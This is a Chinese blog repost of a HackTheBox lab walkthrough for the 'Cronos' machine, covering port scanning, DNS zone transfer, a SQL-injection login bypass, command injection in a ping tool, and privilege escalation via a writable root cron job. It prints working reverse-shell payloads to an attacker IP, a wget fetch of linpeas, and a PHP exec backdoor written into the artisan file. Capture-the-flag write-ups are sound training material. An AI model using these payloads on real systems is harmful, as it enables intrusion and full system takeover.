当前位置: 首页 > news >正文

HackTheBox-Machines--Cronos

news 来源:原创 2024/9/20 10:39:03

文章目录

  • 0x01 信息收集
  • 0x02 命令注入漏洞
  • 0x03 权限提升

Cronos 测试过程

0x01 信息收集

1.端口扫描

发现 SSH(22)、DNS(53)、HTTP(80)端口

nmap -sC -sV 10.129.227.211

在这里插入图片描述

2.53端口开启,进行DNS枚举

    发现子域名:ns1.cronos.htb,确定域名为cronos.htb

在这里插入图片描述

2.1 DNS区域传输

  返回主域、子域:cronos.htb、admin.cronos.htb、ns1.cronos.htb、www.cronos.htb

在这里插入图片描述

3.访问发现的主域、子域

3.1 IP访问、ns1.cronos.htb
在这里插入图片描述

3.2 cronos.htb 和 www.cronos.htb

  两个链接都指向外部网站 Laravel,搜索相关Laravel漏洞,但是不知道具体版本。
在这里插入图片描述

3.3 admin.cronos.htb

在这里插入图片描述

  admin.cronos.htb指向登录请求,尝试进行SQL注入漏洞

# 用户名输入paylaod
' or 1=1-- -

在这里插入图片描述

0x02 命令注入漏洞

  在抓取执行命令的请求包后,发现Net Tool工具执行的命令检索为:ping -c 1 127.0.0.1,command 和 host 拼接进行执行。

1.尝试更改command命令进行命令注入

在这里插入图片描述

# 更改command命令为id,host留空,执行命令为:id,成功响应
id

在这里插入图片描述

2.执行命令获取反弹shell

# payload
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.25/4444+0>%261'

在这里插入图片描述

在这里插入图片描述

  执行成功,获取到shell

在这里插入图片描述

在这里插入图片描述

0x03 权限提升

1.检查可获取root权限文件

# 上传linpeas.sh
wget http://10.10.14.25:8000/linpeas.sh
chmod +x linpeas.sh
bash linpeas.sh

  发现 /var/www/laravel/ artisan 文件是一个计划任务文件,并且将以 root 权限每分钟运行一次。
  如果可以 www-data 用户对该文件具有写入权限,那么可以通过在文件中写入反弹shell命令获取到root权限。

在这里插入图片描述

2.检查 artisan 文件权限

  www-data 对 artisan 文件具有写入权限

在这里插入图片描述

3.在artisan 文件写入反弹shell命令

echo  '<?php exec("/bin/bash -c ' "'" 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1' "'" '");' > artisan

在这里插入图片描述

  artisan文件每分钟会执行一次,等到文件执行,获取到root权限

在这里插入图片描述

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • vue使用EventBus进行跨组件通信
  • Android刮刮卡自定义控件
  • Oracle按照主键排序分页sql
  • 2.Redis之Redis的背景知识
  • 可选链与空值合并运算符的妙用
  • C++进阶之路:何为运算符重载、赋值运算符重载与前后置++重载(类与对象_中篇)
  • python:大文件分批/块导入数据库方式记录
  • 富格林:可信方法防备暗箱操作
  • 与神对话-1
  • 面试中算法(A星寻路算法)
  • tomcat--安全配置多虚拟机
  • 2024年,游戏行业还值得进入吗?
  • 在ARM开发板上,栈大小设置为2MB(常用设置)里面存放的数据
  • 盲人社区生活支持体系:织就一张温暖的网
  • 蓝桥杯嵌入式国赛笔记(2):拓展板按键程序设计
  • ----------
  • iBatis和MyBatis在使用ResultMap对应关系时的区别
  • isset在php5.6-和php7.0+的一些差异
  • Java Agent 学习笔记
  • JSDuck 与 AngularJS 融合技巧
  • swift基础之_对象 实例方法 对象方法。
  • UMLCHINA 首席专家潘加宇鼎力推荐
  • vue-loader 源码解析系列之 selector
  • Wamp集成环境 添加PHP的新版本
  • 创建一个Struts2项目maven 方式
  • 大数据与云计算学习:数据分析(二)
  • 简单基于spring的redis配置(单机和集群模式)
  • 排序算法学习笔记
  • 前端_面试
  • 前嗅ForeSpider中数据浏览界面介绍
  • 如何在GitHub上创建个人博客
  • 什么软件可以剪辑音乐?
  • 使用 5W1H 写出高可读的 Git Commit Message
  • 使用 QuickBI 搭建酷炫可视化分析
  • 使用Gradle第一次构建Java程序
  • 数据库巡检项
  • ​比特币大跌的 2 个原因
  • ‌前端列表展示1000条大量数据时,后端通常需要进行一定的处理。‌
  • #{}和${}的区别是什么 -- java面试
  • #Linux(帮助手册)
  • (06)Hive——正则表达式
  • (Pytorch框架)神经网络输出维度调试,做出我们自己的网络来!!(详细教程~)
  • (层次遍历)104. 二叉树的最大深度
  • (第一天)包装对象、作用域、创建对象
  • (含react-draggable库以及相关BUG如何解决)固定在左上方某盒子内(如按钮)添加可拖动功能,使用react hook语法实现
  • (强烈推荐)移动端音视频从零到上手(下)
  • (原創) 是否该学PetShop将Model和BLL分开? (.NET) (N-Tier) (PetShop) (OO)
  • (转)VC++中ondraw在什么时候调用的
  • (转载)Linux 多线程条件变量同步
  • .NET 8 中引入新的 IHostedLifecycleService 接口 实现定时任务
  • .NET Core 和 .NET Framework 中的 MEF2
  • .Net Core中的内存缓存实现——Redis及MemoryCache(2个可选)方案的实现
  • .Net7 环境安装配置
  • .Net接口调试与案例
  • @SuppressWarnings注解